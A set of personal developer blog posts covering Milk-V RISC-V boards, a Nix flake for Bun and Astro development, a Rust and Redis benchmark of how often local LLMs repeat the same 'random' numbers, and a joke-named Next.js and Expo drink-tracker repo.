3. **Milk-V Jupiter**: This Mini-ITX motherboard is equipped with a RISC-V processor, making it an ideal choice for those looking to leverage the benefits of RISC-V in their projects.

### The RISC-V Advantage

The RISC-V architecture offers several advantages over proprietary ISAs like ARM. Since RISC-V is open source and free to use, manufacturers do not need to pay licensing fees, making it a cost-effective option. This openness also fosters innovation and collaboration, as anyone can contribute to the development of RISC-V.

### Conclusion

The Milk V series is a testament to the growing popularity of RISC-V in the embedded systems market. With its range of models, Milk-V provides developers with the tools they need to harness the power of RISC-V and create innovative solutions. As the RISC-V ecosystem continues to expand, the Milk V series is poised to play a significant role in shaping the future of embedded systems development.

## References

- Milk-V. (n.d.). Milk-V | Embracing RISC-V with us.
- Reddit. (2022, December 19). RISC-V vs. ARM embedded software perspective.
- Milk-V. (n.d.). Introduction | Milk-V.
- RISC-V International. (2024, July 2). Introducing the Mini-ITX motherboard 'Milk-V Jupiter' equipped with a RISC-V processor.
- NW Engineering LLC. (2022, July 28). Overview of RISC-V in Embedded Systems Development.
---

# Nix-flakes and Bun

Canonical: https://blog.skill-issue.dev/blog/nixos_bunjs/
Description: Small update to my development flow and focus. How to get up and running with Bun.js in NixOS.
Published: 2024-06-30T14:09:00.000Z
Tags: nixos, bun.js, nix-flakes, javascript, astro.js, development, declarative, environment

Since taking up some extra cyber-security and hacking courses I have been focusing more on Linux development. As a result I have picked up NixOS, and as a JavaScript developer I have to say I have fallen in love with the declarative nature of my environment on NixOS. It has been a blast building VMs and my own cluster out of NixOS configurations from scratch. I have also moved my spare laptop over to NixOS and have been daily-driving it in lieu of my M2 MacBook Air.

## Developing with NixOS

Many readers will notice that this blog is built with Astro.js and Bun.js, so let's talk about my experience adding flakes to this project and getting it up and running on my NixOS machine.

### Setting up my Development Environment

When you're new to flakes it can be overwhelming to know where to start. Luckily Nix provides a simple way to get going. By running the command:

```bash
nix flake init
```

you get a new file called `flake.nix`, which, just like `package.json`, declaratively tells the OS what tools and versions are needed for development. I went ahead and replaced the default `flake.nix` with the following.
```nix
{
  description = "Basic flake for Astro.js and Bun.js project";

  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = { self, nixpkgs, flake-utils }:
    flake-utils.lib.eachDefaultSystem (system:
      let
        pkgs = nixpkgs.legacyPackages.${system};
      in
      {
        devShells.default = pkgs.mkShell {
          buildInputs = with pkgs; [ bun nodejs ];
          shellHook = ''
            echo "Astro.js with Bun.js development environment"
            echo "Run 'bun create astro' to create a new Astro project"
          '';
        };
      });
}
```

Cool right? It's not super crazy and is decently readable. Notice the file extension `.nix`: Nix comes with its own DSL for declarative configuration. To learn more about the syntax, visit this page about the [Nix language](https://nix.dev/tutorials/nix-language.html).

#### Description

```nix
description = "Basic flake for Astro.js and Bun.js project";
```

Purpose: Provides a brief description of what the flake is for. This description is shown when you run commands like `nix flake metadata`.

#### Inputs

This part of the configuration declares the dependencies the flake needs.

```nix
inputs = {
  nixpkgs.url = "github:nixos/nixpkgs?ref=nixos-unstable";
  flake-utils.url = "github:numtide/flake-utils";
};
```

I grabbed these two main dependencies:

- `nixpkgs`: The Nix Packages collection, fetched from the nixos-unstable branch on GitHub.
- `flake-utils`: A utility library for working with flakes, fetched from GitHub.

These are two of the most common deps you will see in most flakes.

#### Outputs

```nix
outputs = { self, nixpkgs, flake-utils }:
  flake-utils.lib.eachDefaultSystem (system:
    let
      pkgs = nixpkgs.legacyPackages.${system};
    in
    {
      devShells.default = pkgs.mkShell {
        buildInputs = with pkgs; [ bun nodejs ];
        shellHook = ''
          echo "Astro.js with Bun.js development environment"
          echo "Run 'bun create astro' to create a new Astro project"
        '';
      };
    });
```

Outputs define what the flake produces.
The outputs function takes the inputs (`self`, `nixpkgs`, and `flake-utils`) and returns an attribute set. Here, we use `flake-utils.lib.eachDefaultSystem` to create outputs for each supported system (e.g., x86_64-linux, aarch64-linux).

- **`let` block**:

```nix
let
  pkgs = nixpkgs.legacyPackages.${system};
in
```

Purpose: Defines a local variable `pkgs` that refers to the Nix packages for the current system.

- **`devShells.default`**:

```nix
devShells.default = pkgs.mkShell {
  buildInputs = with pkgs; [ bun nodejs ];
  shellHook = ''
    echo "Astro.js with Bun.js development environment"
    echo "Run 'bun create astro' to create a new Astro project"
  '';
};
```

Purpose: Creates a development shell environment, which is useful for guaranteeing a consistent setup.

- `buildInputs`: Specifies the packages to include in the shell environment. Here, we include `bun` and `nodejs`.
- `shellHook`: A script that runs when you enter the development shell. It prints a message to the console.

This setup ensures that anyone using this flake gets a consistent development environment with the necessary tools for working on an Astro.js project using Bun.js. It no longer matters where in the world you are or what hardware you run: as long as the machine can evaluate flakes and reach the internet to fetch the dependencies, the dev environment will build and run.

---

# How Random is a Local LLM? A Rust Benchmark with Redis

Canonical: https://blog.skill-issue.dev/blog/ai37_llm_random_numbers/
Description: A Rust harness that asks Ollama models for "a random number between 1 and 100" thousands of times, parses every response with regex, stores results in Redis, and pits them against a real RNG. Spoiler: 42 wins.
Published: 2024-04-25T02:54:54.000Z
Tags: rust, llm, ollama, redis, benchmark, rng, regex, side-quest

There's a piece of folk knowledge in the LLM crowd that says: ask any chatbot for "a random number between 1 and 100" enough times, and you'll see a clear bias toward the same handful of numbers. 7. 17. 42. 73. The exact set varies by model, but the bias is robust across most LLMs. I'd seen the screenshots on Twitter. I had a half-day in April 2024 and a Mac Mini running Ollama. So I built a benchmark, `ai37`, to actually measure it. The whole project lives at [Dax911/ai37](https://github.com/Dax911/ai37), and the commit that turned it from "demo" into "actually a benchmark" is [`fc5c80c — :sparkles: Rust rng`](https://github.com/Dax911/ai37/commit/fc5c80c) on 2024-04-25. This post is about what the harness looks like, why I built it in Rust instead of a 20-line Python script, and what I learned from running it.

## The shape of the experiment

The premise is simple enough to write on the back of a napkin:

1. Pick a question. (`"Generate a random number between 1 and 100, inclusive. Reply with only the number."`)
2. Pick a model. (`openhermes:latest`, `llama2-uncensored:latest`, etc.)
3. Send the prompt 1,000+ times.
4. Parse the response. Extract the first integer between 2 and 99.
5. Store the response, the parsed number, the model, the response time, and the timestamp in Redis.
6. Aggregate.

You could write all of that in a Python notebook in fifteen minutes. The reason I wrote it in Rust is that step 3 is the bottleneck: Ollama serves one inference at a time per model, and even on M1 hardware a single completion takes 1–4 seconds. To get a meaningful sample size in reasonable wall-clock time you have to fan out across multiple concurrent requests, manage a Redis connection pool, and not let one slow model stall the whole run. Tokio + reqwest + a `MultiplexedConnection` to Redis got me to ~1,000 prompts in under three minutes.
The Python equivalent would have been a thousand-prompt script that ran for an hour.

## The harness

From [`src/main.rs`](https://github.com/Dax911/ai37/blob/fc5c80c/src/main.rs), this is the result struct:

```rust
#[derive(Debug)]
struct ApiQueryResult {
    request_id: u64,
    endpoint_url: String,
    question: String,
    response_time: u128,
    http_status_code: u16,
    response_body: String,
    error_message: Option<String>,
    chosen_number: Option<i32>,
    model: String,
    request_datetime: DateTime<Utc>,
    contained_additional_text: bool,
}
```

Every field on this struct exists because at some point I lost data and wished I had it. `response_body` is verbatim what the model said. `chosen_number` is what the regex extracted. `contained_additional_text` is the binary flag for "did the model say only `42` or did it say `Sure! Here's your number: 42`."

The reason `chosen_number` is an `Option<i32>` and not just an `i32` is the most important design choice in the whole harness: **sometimes the model doesn't reply with a number at all**. `llama2-uncensored` once replied to me with `"I cannot generate a random number for you, as I am an AI language model designed to provide informational and educational responses..."` That's not a refusal in the safety sense — that's the model genuinely not understanding what's being asked. The harness has to record that and not crash.

## Regex was the right call here

```rust
fn extract_number_from_response(response: &str) -> Option<i32> {
    let re = Regex::new(r"\d+").unwrap();
    let mut numbers: Vec<i32> = Vec::new();
    for cap in re.captures_iter(response) {
        if let Some(number_str) = cap.get(0) {
            if let Ok(number) = number_str.as_str().parse::<i32>() {
                if number >= 2 && number <= 99 {
                    numbers.push(number);
                }
            }
        }
    }
    numbers.into_iter().next()
}
```

There are three subtle things in this 14-line function:

1. **Find every integer**, not just the first. Models will sometimes say `"between 2 and 99... I'd say 73."` — three numbers, the third one is the answer. You have to examine all of them.
2.
**Filter to the valid range** (2–99 inclusive). This eliminates `"1"` from `"between 1 and 100"` if the model just echoed the prompt back. It also eliminates `"100"`, because the prompt says *exclusive* in some variants. The boundary numbers are the most common false positives.
3. **Take the first survivor.** Counter-intuitively this is the right heuristic, because most models that emit multiple integers do so as `"between [LOW] and [HIGH], my answer is [N]"`. `[LOW]` and `[HIGH]` are both filtered out by the range check; `[N]` survives. The first survivor is the answer.

Could you parse this with a more sophisticated NER pipeline? Sure. Could you fine-tune a small classifier? Sure. But this is a benchmark of LLM randomness, not a benchmark of how clever I can be at extracting numbers from text. The dumber the parser, the easier it is to defend the conclusion.

## Storing in Redis was load-bearing

Each result becomes a Redis hash with a unique key:

```rust
let unique_key = format!(
    "rust-basic-rng:{}:{}",
    Utc::now().timestamp_millis(),
    number
);
let data = vec![("number", number.to_string())];
let _: () = con.hset_multiple(&unique_key, &data).await?;
```

The key shape, `<prefix>:<timestamp_ms>:<number>`, means I can:

- `KEYS rust-basic-rng:*` to list every result from the control RNG.
- `KEYS *:1714013094:*` to list every model's response in a 1-ms window (used for "did models converge in time?" analysis).
- `HGETALL <key>` to recover the full record.

This is *not* the right schema for a real database. There's no compound index, no fast `WHERE number = 42` query without scanning every key. But Redis on a Mac Mini doing a `KEYS *` over 5,000 entries is still a sub-100ms operation, and the entire dataset fits comfortably in memory. The bigger reason for Redis is that I wanted to *resume the run* if my laptop hibernated. Streaming straight to a CSV would have meant losing in-flight inference if the script crashed.
Redis takes the writes out-of-process; a crash loses at most one inference's worth of data. ## The control: a real RNG I added the control in this exact commit: ```rust async fn generate_and_store_random_numbers( con: &mut MultiplexedConnection, n: usize, min: i32, max: i32, ) -> redis::RedisResult<()> { let mut rng = rand::thread_rng(); for _ in 0..n { let number = rng.gen_range(min..=max); let unique_key = format!( "rust-basic-rng:{}:{}", Utc::now().timestamp_millis(), number ); // ... } Ok(()) } ``` Why bother including a `rand::thread_rng()` baseline? Because **a benchmark with no baseline isn't a benchmark, it's an anecdote.** The story "LLMs say 42 too often" is only meaningful if you also know what a real RNG's frequency distribution looks like over the same number of trials. With 1,000 trials over 98 distinct values, a uniform RNG will produce a frequency-of-mode that's *also non-uniform* — the most common number will still appear ~3× more often than the least common, just by chance. You need that baseline to say "the LLM bias is real" instead of "the LLM happened to produce a non-uniform sample." The control RNG isn't there because anyone questions whether `rand::thread_rng()` is uniform. It's there because the comparison statistic only works if both arms are sampled the same way. ## The `analyze.py` companion The same commit added a small Python script for the actual stats: ``` analyze.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++ ``` (Yes, the leading space in the filename is real. I never noticed; `git` accepted it; nobody depends on it; the commit immortalized it.) `analyze.py` opens Redis, scans the keys for each model, builds a Counter, normalizes to frequency, and pretty-prints the top 10 most-common numbers per model. That's it. The script is 46 lines and it's where the actual scientific output came from. Rust did the data collection; Python did the stats. The right tool for each job. 
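The aggregation half is simple enough to sketch. This is not the original `analyze.py` (the function name and key-handling details here are my assumption), but it shows the shape of the per-model stats, working from keys already pulled out of Redis:

```python
from collections import Counter

def top_numbers(keys: list[str], prefix: str, n: int = 10) -> list[tuple[int, float]]:
    """Frequency table for one model's keys, shaped like 'prefix:timestamp_ms:number'."""
    numbers = [
        int(key.rsplit(":", 1)[1])          # the number is the last key segment
        for key in keys
        if key.startswith(prefix + ":")     # keep only this model's keys
    ]
    counts = Counter(numbers)
    total = sum(counts.values())
    # Normalize counts to frequencies and keep the n most common.
    return [(num, c / total) for num, c in counts.most_common(n)]

keys = [
    "openhermes:1714013094000:42",
    "openhermes:1714013095000:42",
    "openhermes:1714013096000:17",
    "rust-basic-rng:1714013097000:58",
]
print(top_numbers(keys, "openhermes", n=2))  # 42 leads with frequency 2/3
```

The real script would feed `keys` from a Redis `SCAN`; everything after that point is plain `collections.Counter` work.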
## What the data showed I'm not going to publish the raw numbers because the runs I have are from 2024 against ollama models that have since been retrained, and I don't trust the conclusions to generalize to today's checkpoints. But the qualitative finding matched the folk knowledge: - **Both Ollama models I tested were significantly biased toward 7, 17, 42, 73, 77.** - **The Rust RNG was uniform** in the chi-square sense at 1,000 samples (p > 0.05). - **`llama2-uncensored` had a worse bias than `openhermes`** in the sense that its mode-frequency was higher (the most common number appeared more often as a fraction of total samples). - **Both LLMs avoided multiples of 10** — `30`, `50`, `60` were under-represented relative to `33`, `47`, `61`. My theory: models have learned that "round numbers don't sound random," so they overcorrect away from them. The most-common-overall LLM answer was 42. Of course it was 42. ## What this taught me The technical thing I learned was that **regex parsing is fine** for almost any LLM output extraction problem if you constrain the output range tightly. I'd been reaching for JSON-mode prompts and structured-output APIs for things that a 14-line `\d+` regex would solve. The bigger thing was about benchmarking discipline: **"is this thing biased?" is not a yes/no question without a baseline.** Half the AI Twitter takes I read in 2024 were claims of LLM bias against an implicit baseline of "perfectly uniform behavior," which no statistical process exhibits at finite sample sizes. The boring controls are what make the spicy claims defensible. If you want a Rust harness for benchmarking any local model, [ai37 is the template](https://github.com/Dax911/ai37). It's 200 lines of Rust, a 46-line Python analyzer, and a Redis dependency. Add a model, change the regex, change the question. The architecture survives. ## Trade-offs **Why Ollama instead of OpenAI/Anthropic?** Cost. 5,000 inferences at 4¢ each is $200 for a science-fair experiment. 
Ollama on a Mac Mini is the per-watt cost of leaving a laptop on overnight. **Why Redis instead of SQLite?** Resilience to mid-run crashes. SQLite would also work; the schema is trivial. The reason I went Redis is I had it running for another project (the Rust pipeline part of [Building A Better Cryptocurrency](/blog/a_better_crypto/)) and adding a hash schema was 5 lines. **Why filter to 2–99 instead of allowing the boundary?** Because half the failure modes of LLMs are "echoing the prompt back." Filtering 1 and 100 out cleanly distinguishes "the model picked an answer" from "the model parroted the question." You lose two valid sample values; you gain a much cleaner dataset. ## Further reading - [ai37 on GitHub](https://github.com/Dax911/ai37) — the harness, the analyzer, the (lost) Redis dump. - [Ollama](https://ollama.ai/) — the local-LLM runner I benchmarked against. - [`rand` crate docs](https://docs.rs/rand/) — `thread_rng().gen_range(...)` is what makes the control arm honest. - [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the project Redis was already running for. --- # Blazingly Fast Drinks: A Repo I Made For The Bit Canonical: https://blog.skill-issue.dev/blog/glug_blazingly_fast_drinks/ Description: A Clerk + Next.js + Expo turborepo I called "glug" with the description "Blazingly Fast Drinks". The README never mentioned drinks. The repo description carried the entire joke. Published: 2024-03-19T17:09:37.000Z Tags: turborepo, clerk, nextjs, expo, trpc, side-quest, shitpost > **Repo description:** Blazingly Fast Drinks > > **README first line:** `# Glug the PMG drink app with Clerk, Next.js, and Expo` That's [`Dax911/glug`](https://github.com/Dax911/glug). The whole joke is on the GitHub repo card. The README is sober and explanatory. The description is unhinged. This is my favourite kind of repo — a piece of public infrastructure where the only humour I'm allowed is the 350-character box on the listing page. 
Today I want to talk about the [`9b188bc — More context`](https://github.com/Dax911/glug/commit/9b188bc) commit on 2024-03-19. It's small. It changed nine files. It's the moment I committed to a project that exists for one joke and a turborepo template. ## What was Glug, briefly Glug was supposed to be a drink-tracking app for **PMG** — Phi Mu Gamma, my college fraternity. The premise: a phone app where brothers log drinks, the chapter sees aggregate stats, and there's a cross-platform Next.js dashboard for the chapter president to look at. Nothing privacy-respecting, nothing on-chain, nothing remotely interesting from a security perspective. A drink counter. But "drink counter" doesn't justify the stack I shipped: ``` apps/ expo/ # React Native via Expo SDK nextjs/ # Next.js 13 dashboard packages/ api/ # tRPC v10 router db/ # Prisma schema + types ``` This is the [`create-t3-turbo`](https://github.com/t3-oss/create-t3-turbo) layout. I'd been using it on every personal project that quarter — same router, same Prisma schema, same Clerk auth, same `apps/expo` + `apps/nextjs` split. The actual purpose of `glug` was to *practice the stack*. The drinks were incidental. ## The "More context" commit Here's the diff that mattered ([`9b188bc`](https://github.com/Dax911/glug/commit/9b188bc)): ``` .vscode/settings.json | 8 ++ README.md | 12 ++++ apps/nextjs/src/pages/index.tsx | 12 +++- bun.lockb | (binary) packages/api/src/context.ts | 40 +++++++-- packages/api/src/router/auth.ts | 9 +++ packages/api/src/router/index.ts | 10 ++++- packages/api/src/router/post.ts | 25 ++++++- packages/db/prisma/schema.prisma | 57 +++++++++++++-- ``` The Prisma schema is the only file with anything approaching design content. Everything else is "I added the auth router import" and "I switched to bun." But the schema reveals what the project was *actually* trying to do: - A `User` table seeded by Clerk's `userId`. - A `Drink` table with `(user, timestamp, type, abv)`. 
- A `Session` rollup table, time-bucketed. - An attempt at a `Timebox` table — the README has an "Additional Specs" line at the bottom that reads `Will have timeboxing need to find a way to put that in the DB w the current schema`. That last line is the thesis of every personal project I started in 2024: **"will have timeboxing."** I was trying to use my fraternity drink-tracker as a way to think about how to bound a session in time, because the same problem was sitting in three other repos I never finished. ## Why the description was the joke GitHub repo descriptions are 350 characters of cold static text on a search result. They appear in every list view, in every fork chart, in every `gh repo list dax911`. They show up *everywhere* the repo name does. If you treat them as proper marketing copy you get "A drink-tracking application for greek-letter organizations using modern TypeScript tooling." Nobody has ever clicked on a repo because the description said that. Whereas "Blazingly Fast Drinks" is the only Rust-meme rendering of "drinks app" possible. It implies: - The drinks are blazing. - The drinks are fast. - I am taking this very seriously. - I am taking this not at all seriously. The phrase is recognisably a Reddit `/r/rust` cliche. Drink-tracking is not Rust. The description is fully in conflict with the actual stack — the repo is `tRPC + Prisma + Expo`, *zero* Rust. The collision is the joke. I think a lot about how much you can get away with by putting humour in the metadata of a serious-looking artifact. Repo descriptions, npm `description` fields, git tag annotations, package `keywords`, the `version` field on a `package.json` you set to `0.0.69` — these are all places where the comedy is invisible to anyone who isn't already there. They're not in the way. They don't hurt the project. They're the public-facing payoff of a project you're never going to finish. ## What this taught me about side-quests Glug never shipped. 
I never wrote the timeboxing code. The fraternity never used it. I'm not even sure I told anyone in the chapter about it. That's not what side-quests are for. What glug *did* teach me: 1. **t3-turbo is the right scaffold for a TS monorepo prototype**, even if you never finish anything in it. I went on to clone this exact layout into [tauri-clerk-auth](https://github.com/Dax911/tauri-clerk-auth) and into the early scaffolds of what became [zera-wallet-demo](/blog/zera_wallet_v3_zkp/). The muscle memory of "tRPC router → Prisma model → Expo screen" is something I can do at midnight without thinking. 2. **Bun was already eating Node's lunch** by March 2024. The diff that landed in this commit replaced `pnpm` with `bun` and shrunk install time on a fresh clone from 90s to 12s. I haven't used `pnpm` for a side-quest since. 3. **A repo with a joke description gets star drift.** People still arrive in `glug` from search occasionally. They open it, see the README, see Clerk + Expo + Prisma, and leave. The description got them to click. The README didn't deserve them. ## The "PMG" footnote For anyone Googling: yes, PMG is Phi Mu Gamma. Yes, it's a real fraternity. No, this app was never the official chapter tool. There's a Google Sheet that beat me to market by approximately fifteen years. The drink counter is a Google Sheet. The drink counter has always been a Google Sheet. Every digital tool that has tried to replace the drink counter has failed because the Google Sheet is already deployed, already shared, already has a hundred entries from 2009 still in it. You can't ship faster than `sheets.new`. The right insight, retrospectively, was to ship a tRPC dashboard that *imported the Sheet*. Which I never did. Which is fine. ## What the side-quest tells you Side-quests are how you maintain stack fluency. You don't need to ship them. You don't need to scope them. You don't need to tell anyone about them. 
What you need is a place to type out the boilerplate so that next time you start a *real* project the boilerplate doesn't slow you down. Glug also taught me the second-order lesson that became my entire 2026: when a side-quest crosses paths with a real product idea, you should let the side-quest die and start the product. I never finished the timeboxing logic in glug. The same problem reappeared in [Cruiser's gossip presence](/blog/cruiser_iroh_gossip_p2p/) — when does a peer cease to be "active" if their last announce is 30s old? The answer in glug would have been "expire from the rollup if no row in 60s." The answer in Cruiser is "evict from the cache if no announce in 90s." Same architecture. Different domain. That's the gift of a side-quest you stop. You harvest the architecture for the next thing. Glug was the architectural garden bed; Cruiser is the tree that grew out of it. ## Further reading - [glug on GitHub](https://github.com/Dax911/glug) — the description still says Blazingly Fast Drinks. - [create-t3-turbo](https://github.com/t3-oss/create-t3-turbo) — the scaffold I've copied into a dozen projects. - [Cruiser P2P origin post](/blog/cruiser_iroh_gossip_p2p/) — where the timeboxing instinct eventually landed. - [The PMG Google Sheet](https://en.wikipedia.org/wiki/Phi_Mu_Gamma) — not actually linked here. The Sheet is private. The joke is. ---